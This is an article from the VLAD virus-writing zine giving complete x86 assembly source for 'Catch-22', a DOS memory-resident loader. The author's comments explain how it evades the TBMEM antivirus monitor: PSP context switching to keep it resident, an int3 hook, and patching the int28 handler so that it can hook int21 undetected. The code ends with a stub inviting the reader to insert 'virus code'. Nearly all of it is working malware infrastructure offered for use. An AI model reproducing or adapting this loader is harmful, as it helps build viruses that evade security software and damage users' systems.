VLAD Magazine - Issue #3 - ARTICLE.5_3 - Catch-22 TSR Loader Source Code

1. ; Catch-22, a TSR loader by Rhincewind [Vlad]
2. ;
3. ; This is probably the most experimental thing I've done so far. In this
4. ; loader I've combined a few things I learned about tbmem into a pretty
5. ; neat loader that the current version of tbmem will not detect.
6. ;
7. ; The highloader is pretty straightforward, although it does use one
8. ; trick I found. It traces the PSP chain all the way back to the command
9. ; interpreter, then makes that PSP active before a block is allocated for
10. ; the loader. This so-called 'context switching' will make the newly
11. ; allocated block property of your command interpreter, ensuring it's
12. ; lasting residency. Down with direct MCB twiddling!
13. ;
14. ; Now tbmem comes into play. First, two facts:
15. ;
16. ; Fact 1 - Tbmem detects residency on vectorchanges only. It can't be
17. ;          bothered to look at the memory itself.
18. ; Fact 2 - Tbmem does not flag on intel reserved registers being hooked.
19. ;
20. ; For starters the loader will hook int3, thereby not alerting tbmem as
21. ; above. The first byte of the int28 handler, which is an IRET in the
22. ; original handler, will be overwritten
23. ; with an int3. Now, as you probably know, only the command
24. ; interpreter calls int28 (Okay, so do Terminate and a handful of other
25. ; programs, watch out for those) which is redirected to our routine.
26. ; We managed to get a routine active around tbmem! Hurray! Now, the int3
27. ; handler will countdown 75 times, 13 is the minimum btw, to make sure
28. ; that we're back in command mode, that is, out of the dos deallocation
29. ; routines before we hook int21, which again, will elude tbmem. Both int28
30. ; and int3 are restored and we're done with our loader.
31.  
32.                 .model tiny
33.                 .code
34.                 org 100h
35. parasize        equ (endloader-start)
36. start:
37.                 mov ax, 'TB'
38.                 int 21h
39.                 cmp ax, 'AV'
40.                 jz exit_tsr
41.                 mov ah, 4ah
42.                 mov bx,-1
43.                 push ax
44.                 int 21h
45.                 pop ax
46.                 sub bx, parasize+2
47.                 int 21h
48.                 xor si,si
49. nextpsp:
50.                 cmp bx, word ptr ds:[si+16h]
51.                 mov bx, word ptr ds:[si+16h]
52.                 mov ds,bx
53.                 jnz nextpsp
54. found_cmd:
55.                 mov ah, 50h
56.                 int 21h
57.                 mov ah, 48h
58.                 mov bx,parasize+1
59.                 int 21h
60.                 mov es,ax
61.                 mov ah, 50h
62.                 mov bx,cs
63.                 int 21h
64.                 push cs
65.                 pop ds
66.                 mov si, 100h
67.                 xor di,di
68.                 mov cx, endloader-start
69.                 rep movsb
70.                 mov ds,cx
71.                 mov si, 3*4
72.                 movsw
73.                 movsw
74.                 cli
75.                 mov word ptr [si-4],offset install_21-100h
76.                 mov word ptr [si-2],es
77.                 sti
78.                 mov si, 28h*4
79.                 movsw
80.                 movsw
81.                 mov ax,75h
82.                 stosw
83.                 mov word ptr es:[di],75h
84.                 lds bx, dword ptr ds:[si-4]
85.                 mov al, 0cch
86.                 xchg byte ptr ds:[bx],al
87.                 stosb
88.                 ;Restore all registers here, including DS&ES
89. exit_tsr:                
90.                 int 20h
91. install_21:    
92.                 dec word ptr cs:counter-100h
93.                 jnz exit_int3
94.                 push ax
95.                 push di
96.                 push ds
97.                 push es
98.                 xor ax,ax
99.                 mov ds,ax
100.                 les di, dword ptr cs:int2offset-100h
101.                 mov al, byte ptr cs:orgbyte-100h
102.                 stosb
103.                 cli
104.                 les di, dword ptr cs:intoffset-100h
105.                 mov word ptr ds:[0ch],di
106.                 mov word ptr ds:[0eh],es
107.                 mov ax,offset int21-100h
108.                 xchg ax, word ptr ds:[84h]
109.                 mov cs:intoffset-100h,ax
110.                 mov ax,cs
111.                 xchg ax, word ptr ds:[86h]
112.                 mov cs:intseg-100h,ax
113.                 sti
114.                 pop es
115.                 pop ds
116.                 pop di
117.                 pop ax
118. exit_int3:                
119.                 add sp,6
120.                 iret
121. ;Replace the handler below with your k-rad virus code.
122. int21:
123.                 cmp ax,'TB'
124.                 jnz return_int
125.                 mov ax, 'AV'
126.                 iret
127. return_int:                
128.                 jmp dword ptr cs:intoffset-100h
129. endloader:
130. intoffset      dw ?
131. intseg         dw ?
132. int2offset     dw ?
133. int2seg        dw ?
134. counter        dw ?
135. orgbyte        db ?
136.  
137.                 end start